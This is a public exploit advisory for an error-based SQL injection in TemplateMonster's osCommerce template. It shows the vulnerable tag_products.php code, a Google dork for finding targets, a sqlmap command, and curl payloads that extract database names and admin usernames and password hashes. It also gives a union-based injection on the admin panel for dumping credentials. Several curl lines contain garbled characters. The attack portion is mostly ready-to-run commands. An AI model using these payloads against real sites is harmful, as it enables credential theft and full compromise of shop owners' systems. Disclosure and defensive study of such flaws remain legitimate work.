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osCommerce Error-based SQL Injection

osCommerce Error-based SQL Injection
Posted May 3, 2017
Authored by Project Insecurity, MLT | Site insecurity.zone

TemplateMonster osCommerce prior to version 2.3x suffers from an error-based SQL injection vulnerability.

tags | exploit, web, vulnerability, sql injection
SHA-256 | 38a0fda4c724cdbc0647c49a836ea0b337317dd4887ab047e366bf56eaec7836

osCommerce Error-based SQL Injection

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| Vulnerable Software: TemplateMonster osCommerce |
| Vendor: http://templatemonster.org |
| Vulnerability Type: Error-based SQL Injection |
| Date Released: 23/04/2017 |
| Released by: Project Insecurity (@insecurity)|

TemplateMonster is a site that makes templates for various content management systems. There are severe SQL injection
issues in their template for popular CMS 'osCommerce' - this can lead to a complete system compromise of any site using this
template. Estimated around 70k-100k vulnerable sites although not that many are indexed on google.

This source apears to be a developer from templatemonster releasing source code publicly instead of forcing users to pay for it.
The source is vulnerable to SQL INJECTION in the tag_products.php file:

The code for this file can be seen below:
$tag_id= $HTTP_GET_VARS['id_tag'];
$tags_query = tep_db_query("select * from ". TABLE_TAGS ." where tag_id='". $tag_id ."'");
while ($tags_result = tep_db_fetch_array($tags_query)) {
$tag_text = urldecode($tags_result['tag_text']);
As you can see above, it does not escape the SQL statement and accepts any value for the id_tag GET param

Basic PoC of how exploitation would take place using SQLMap + cURL (and html2text for sorting):
#OsCommerce TemplateMonster ERROR BASED SQL Injection Vulnerability Checker & Exploiter
#Google Dork: inurl:tag_products inurl:id_tag -github
#Sqlmap Command: python sqlmap.py -u http://localhost/tag_products.php?id_tag=6 --dbms=MYSQL --random-agent --level=5 --risk=3 --threads=10 --test-filter=FLOOR
#Requirements: curl, html2text, grep, head
#curl -s http://localhost/tag_products.php?id_tag=9%20%20AND%20%28SELECT%206354%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20%28ELT%286354%3D6354%2C1%29%29%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.plugins%20GROUP%20BY%20x%29a%29 |grep "<font"|html2text|head -n1
#Get results in clear form
#|grep "<font"|html2text|head -n1| cut -d"'" -f2| rev | cut -c 2- | rev
#Change Limit 1,1 to Limit 2,1 etc to find database names
#curl AC/a!as http://localhost/tag_products.php?id_tag= 6%20AND%20%28SELECT%205140%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201%2C1%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20%0A |grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
#Current Database
#curl AC/a!as http://localhost:80/tag_products.php?id_tag=6%20AND%20%28SELECT%207847%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29|grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
#Admin Password change CURRENT_DATABASE to database found in previous request
# curl AC/a!as http://localhost/tag_products.php?id_tag=6%20AND%20%28SELECT%204796%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20MID%28%28IFNULL%28CAST%28user_password%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20%24CURRENT_DATABASE.administrators%20ORDER%20BY%20user_password%20LIMIT%200%2C1%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29|grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
#Admin User_Name change CURRENT_DATABASE to database found in request beforehand
# curl AC/a!as http://localhost/tag_products.php?id_tag=6%20AND%20%28SELECT%204796%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20MID%28%28IFNULL%28CAST%28user_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20%24CURRENT_DATABASE.administrators%20ORDER%20BY%20user_password%20LIMIT%200%2C1%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29|grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev

Public Vulnerability that can be used in conjunction to this exploit:

Once the credentials have been stolen and an attacker has logged into the admin panel they can run union based SQL injection queries
and thus be able to steal the database faster and be able to read files and/or input into files causing complete system compromise.

http://[HOST]/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --

Btw, we will write an actual PoC for this that can be ran as a python or bash script if any of you guys are interested :)
For both of these exploits (0day + public vuln) used in conjunction with eacohter. Let us know if there's any appeal for that.

How to fix: properly escape SQL queries / sanatize user inputs.. no response from vendor after months and months of effort. Despite
MANY websites being vulnerable. Some vuln site admins contacted, seemed panicked (and rightfully so)

| |
| IRC: irc.insecurity.zone (6667/6697) #insecurity |
| Twitter: @insecurity |
| Website: insecurity.zone |

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